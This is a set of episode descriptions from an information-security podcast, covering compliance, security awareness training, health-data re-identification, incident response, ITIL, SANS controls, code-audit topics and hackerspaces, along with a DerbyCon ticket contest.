Checkbox Security... checklists required to follow by compliance people and many security people have to fall in line, because they often have no choice.
But what if there was a way to use compliance requirements to get beyond the baseline of PCI/SOCII/HIPAA, and get to be more secure?
Megan Wu (@tottenkoph), Mr. Boettcher, and I spent a bit of time discussing just that. We discuss basic issues with compliance frameworks, how to get management to buy-in to more security, and even how you can get Compliance people to help without them knowing it.
After last week's discussion of end-user training in the SANS top 20 security controls, we realized that it would be great to discuss how a company involved in training does proper training.
So we hit up our sponsor at Cybrary.it to discuss their end-user security training track and how companies can use it to help their employees to be more secure in their workplace.
We end the podcast with a bit of audio from the Bsides Austin blue/red panel Mr. Boettcher moderated. He asked them about training and it's worth. The first answer from Justin Whitehead is telling as to how he believes training will fail regardless. His answer was chilling in fact, and we hope to continue that conversation with him in the future about it.
For long time listeners of the podcast, back when Brian and I wanted to do the podcast, we were working at the same company, and the first podcast we did was on hashes.
Bob story: Bob was getting tired of explaining what MD5, SHA1, SHA2 were to developers, so as we were developing our idea for the podcast, this was the first episode we had. Mr. Boettcher had several ideas for podcasts prior to.
I was actually gonna go it alone, but wanted him to join me. Thankfully, he broached the idea of being on the podcast. This was actually the second take, as the first one was done in our office and we didn't want any legal issues doing it at work, so we trahed that one and made this version. I thought the first take was better, but what are gonna do... :)
End User training. Lots of companies have need of regular security training. Many treat it as a checkbox for compliance requirements, once a year. With the way training is carried out in many organizations, is it any wonder why phishing emails still get clicked, passwords still get compromised, and sensitive information is still leaked.
We discuss methods to make training more effective, and how to make people want to do training.
Finally, we dicsuss Capture-The-Flag competitions, and why it would behoove blue team people to attempt them. They become a great barometer for understanding your shortcomings, and what you as a blue teamer might need to study up on...
Katherine Carpenter is a privacy consultant who has worked all over the world helping to develop guidelines for ethical medical research, sharing of anonymized data, and helping companies understand privacy issues association with storing and sharing of medical data.
This week, we discuss how companies should assign value to their data, the difficulties of doing research with anonymized data, and the ramifications of research organizations that share data irresponsibly.
email contact: email@example.com
Katherine’s note, comment, and links.
It is good to be thinking about de-identification (especially regarding health care data)
I think a better question to ask is how easy is it to re-identify information that has been de-identified. The HIPAA rule has 18 Identifiers which count as Personally Identifiable Information (PII) or Personal Health Information (PHI) include birth date, zip code, and IP address; When data is collected in non-health contexts, these identifiers are not considered PII/PHI (for example: this kind of information can be used for marketing purposes or financial/credit-related purposes).
A brief history on the topic:
in 1997 a precocious grad student IDed the Governor of MA using purchased voter records to reID deIDed health information that was released. (This study was one motivator to pass HIPAA.) Further research along the same lines of the previous project can be summed up with a simple and scary statistic: in 2000, 87% of Americans may be uniquely identified by combining zip code, birthday and sex(gender).
For this reason, health information is threatened not only by deID’n & reID’n, but by the combination of and other types of information that are publicly available or available for purchase and could reveal things about an individual that would contribute to reID of individual’s health info.
Here are a bunch of articles that discuss the topic from different angles.
Dwork, C. and Yekhanin, S. (2008), “New Efficient Attacks on Statistical Disclosure Control Mechanisms,” Advances in Cryptology—CRYPTO 2008, to appear, also at http://research.microsoft.com/research/sv/DatabasePrivacy/dy08.pdf
Is Deidentification Sufficient to Protect Health Privacy in Research?
In an incident response, the need for clear communication is key to effective management of an incident. This week, we had Mick Douglas, DFIR instructor at SANS, and Jarrod Frates, who is a pentester at InGuardians, and has great experience handling incidents. Find out some roles in an incident response (the Shadow, the event coordinator, the lead tech), and how companies should have an IR plan that handles various 'incident severities'.
Jarrod updates us on "TheLab.ms" and how you might like to help them!
Finally, We are holding a contest to win a ticket to DerbyCon, full instructions are below. We are giving away two tickets.
DerbyCon 1st Ticket contest expires 31 July 2015.
1. To enter for a ticket to DerbyCon
a. A donation must be made to Hackers for Charity (http://www.hackersforcharity.org/)
b. Once the donation is made, email your receipt of your donation to firstname.lastname@example.org
c. If you win: We will contact you by the email you mailed the receipt from with our contact information. You will need to contact us when you get to DerbyCon, as we will not send you the ticket directly. You will also be responsible for airfare and accommodations at DerbyCon.
Strap yourselves in ladies and Gentlemen. With Mr. Boettcher gone on "vacation" this week, I needed some help with the podcast, and boy did we pick a doozy. If you're a fan of Turing Complete algorithms, frankly, who isn't ;) , we had Ms. Fabienne Serrière (@fbz) and Ms. Magen Wu (@tottenkoph) who discuss higher order math and psychology on our podcast this week.
We also discuss a little project management and even talk about why proper survey sizes and getting a good cross-section is important.
Be sure to pick up one of Ms. Fbz's scarves, especially if you're a math nut, and love fracctals and patterns as I do.
Elementary Cellular Automaton : http://mathworld.wolfram.com/ElementaryCellularAutomaton.html
Turing Complete: https://en.wikipedia.org/wiki/Turing_completeness
Sierpinski Triangle: https://en.wikipedia.org/wiki/Sierpinski_triangle
Chomsky Hierarchy: https://en.wikipedia.org/wiki/Chomsky_hierarchy
Sergey Bratis: http://www.cs.dartmouth.edu/~sergey/
Stego Hats: http://www.ravelry.com/projects/fbz/pseudo-random-reversible-hat
SeaSec East: http://www.meetup.com/SEASec-East/
My podcast co-host Brian Boettcher, along with Kate Brew, an Austin, TX based security blogger, headed up this panel called "Red Team Vs. Blue Team". The idea was to ask people from various sides of the aisles (attackers and defenders) pressing questions about how the industry operates.
Infosec heavyweights like Kevin Johnson (@secureideas), Mano Paul (@manopaul), Josh Sokol (@joshSokol), made this a very excellent podcast...
We hope you enjoy!
Roxy, who we interviewed a few months ago on our podcast about hackerspaces, is back with us this week to discuss a project she is working on, called 'Big Brown Cloud'. If you've ever wanted to setup your own fake blog and send people to it to gain information on possible attacks, you've come to the right place.
We also get an update on the hackerspace that Jarrod, Sean, and Roxy were getting setup a few months ago. They've come a long way, and they are about to move into their new facility
In this podcast, you'll learn about:
Log analytics software that can be used to parse system logs for naaty malware
Detecting Malware artifacts
learn about windows directory locations
looking for indicators like packing, changed hashes, etc
Tips for capturing malware using tools like RoboCopy
Learn about what code caves are and how malware hides inside them (http://www.codeproject.com/Articles/20240/The-Beginners-Guide-to-Codecaves)
Michael Gough joined us again to discuss malware detection techniques on Windows systems. We talk about how you can modify Powershell's defaults to allow for better logging potential. Also, we find out some hidden gems that pretty much guarantee to let you know that you've been infiltrated.
Stay for the powershell security education, and you also learn some new terminology, like "Malware Archaeology", Malwarians, and 'Log-aholic', to name a few...
This week, we discuss various methods of enabling companies to move applications to cloud based platforms.
We discuss containers, like Docker, and how various hosting services handle converting businesses from a traditional data centers to a secure. cloud based entity.
We even discuss securing the data in the cloud, preventing bad guys from accessing it, as well as the cloud provider themselves, who can be served with a subpeona to hand over data.
Brakeing Down Security would like to thank FireHost for allowing Chase and Mike to join us.
With last week's revelation from Microsoft that they will support SSH, understanding powershell has become more important than ever as a tool to be used by blue teamers, both for adminstration, and to understand how bad guys will use it for nefarious deeds on your network.
Part 2 of our interview with Mick Douglas discusses a bit more about the DEV522 class that he teaches for SANS, and why it seems that blue team (defenders) are not getting the training they should. By being deficient in necessary skills, the knowledge between bad guys and the defenders widens.
We had the opportunity to discuss with Mick Douglas the fact that there is a stigma of blue team always being on the losing end of the security. Is it because there are more tools for the pentesters or bad guys, or that it takes a massive IT budget to be secure? We don't believe so... Great insights into how a blue team can protect their network.
Having a more secure network by deploying tools can be no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and log analysis tool in less than 20 minutes.
When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.
Mr. Boettcher and I continue through the SANS Top25 Critical Security Controls. #10 and #11 are all dealing with network infrastructure. Proper patches, baselines for being as secure as possible. Since your company's ideal security structure needs to be a 'brick', and not an 'egg'.
We continue our journey on the 24 Deadly Programming Sins. If you listened to last week's podcast, we introduced the book we were using as a study tool:
This week is on command injection. We first discussed command injection as part of our OWASP Top 10 for 2013, but you'll be surprised just how easy devs compile conditions that allow for command injection into their code as well.
At DerbyCon last year, Mr. Boettcher did a microcast with Johnny Long. An inspirational human being who left a life many info professionals dream of, and went to Africa to help disadvantaged people make a better life with access to technology.
Where is the audio you ask? Well, we've posted it on out Patreon so that they can have first dibs on it. We'll post it here this weekend for everyone.
He is a great individual and we hope you'll enjoy it.
Code Audits are a necessary evil. Many organizations resort to using automated tools, but tools may not find all issues with code. Sometimes, you need to take a look at the code yourself.
Mr. Boettcher and I begin going through the book "24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them" What we covered this week is "buffer overruns", we discuss what they are, and how they occur.
Get ready for a crash course in code audits. The book is not required, but it definitely helps when we are discussing concepts.
We also mentioned our new Patreon account, so if you are a listener, and want to support what we do, you can give on a per month schedule. Donations are entirely optional, and if you don't wish to give, that's fine too.
24 Deadly Sins on Amazon:
When you're faced with major projects, or working to understand why your IDS fails every day at the same time, there must be a way to work that out. Or when you must do the yearly business continuity failover, you need a process oriented framework to track and ensure changes are committed in a sane, orderly manner.
ITIL is a completely versatile, flexible framework that scales with your organization. You can also use it with your software development lifecycle. You can use it to enhance major projects and security initiatives.
Tim Wood joins us for the second part of his interview. We discuss Change Management, Problem Management and making inter-departmental SLAs a reality for proper management of changes.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Much of InfoSec and Compliance is all about processes, procedures, controls, audits, and the proper management of all of these. To do so, you need a proper framework to make these as seamless as possible. ITIL is one of these types of frameworks.
We introduce Mr. Tim Wood on the podcast, who has over 20 years of ITIL experience and began ITIL implementations in banks and Healthcare systems in the United Kingdom. He currently works with different industries to change culture and make an ITIL a reality.
This week, we go over the History of ITIL, and understand the various incarnations from v1.0 to v3.0. You quickly understand where security will start fitting into all those facets of the ITIL framework.
Tim Wood's Presentation: https://drive.google.com/file/d/0B-qfQ-gWynwiVS0zLTZidml0VzA/view?usp=sharing (view only)
Special interview this week! On the heels of their uber successful KickStarter campaign, we brought co-founder Ryan and one of the technical editors Anthony in to discuss what Cybrary is. We also discuss ways you can leverage it in your own business to get quality security awareness training, as well as train up your employees on infosec topics that can benefit your company and employees. You can find out more at http://www.cybrary.it
It's that time of year again... when all the reports come out that shows how various industries did over the last year.
Brakeing Down Security went over the results of the Verizon PCI report. Did companies do worse this year, or could they have actually improved? Listen to our analysis, and what companies can do to learn from this, and how you can use this report to help get a leg up when your QSA comes calling.
Pay IRS using "Snapcard": http://www.coindesk.com/pay-taxes-bitcoin-snapcard-pay-irs/
According to the US Internal Revenue Service (IRS), virtual currencies are treated as "Property": http://www.irs.gov/uac/Newsroom/IRS-Virtual-Currency-Guidance
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13 - Boundry Defense, and Controlled use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges... When to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
We invited the organizers of the "TheLab.ms", a Dallas, Texas based hacker/makerspace on the podcast to talk about why they wanted to start a makerspace, the costs and plans to setup a hacker space, and some of the things you can do with a makerspace. We also understand the sense of community and the learning environment gained from these places.
If you are looking to start a 'space in your area, or looking to understand why they are needed in a community, you'll want to listen to Roxy, Sean, and Jarrod talk about the highs and lows and even some of the gotchas in setting up a space.